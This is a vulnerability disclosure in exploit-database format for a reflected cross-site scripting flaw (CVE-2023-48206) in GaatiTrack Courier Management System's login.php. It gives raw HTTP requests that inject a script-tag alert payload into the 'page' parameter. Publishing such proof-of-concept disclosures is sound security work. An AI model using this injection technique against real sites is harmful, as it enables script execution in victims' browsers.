# Exploit Title: GaatiTrack Courier Management System v1.0 - Multiple
Cross-site scripting
# Date: 12/112023
# Exploit Author: BugsBD Security Researcher (Rahad Chowdhury)
# Vendor Homepage: https://www.mayurik.com/
# Software Link:
https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php
# Version: v1.0
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56
# CVE: CVE-2023-48206

Description:
Multiple reflected cross-site scripting (XSS) vulnerability exists in
login.php, header.php page of GaatiTrack Courier Management System v1.0
that allows attackers to execute arbitrary web scripts or HTML via a
crafted payload injected into the Website login page parameter.

Steps to Reproduce:
1. Go to login and capture request data using burp suite. Your request data
will be:

GET /gaatitrack/login.php HTTP/1.1
Host: 192.168.1.74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/119.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp
Upgrade-Insecure-Requests: 1

2. Now use XSS payload in login.php. So your request data will be:
GET
/gaatitrack/login.php?page=1</title><script>alert(document.domain)</script>
HTTP/1.1
Host: 192.168.1.74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/119.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp
Upgrade-Insecure-Requests: 1

3. Forward You request data and check browser. You will be popup with
domain.

## Reproduce:
[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48206)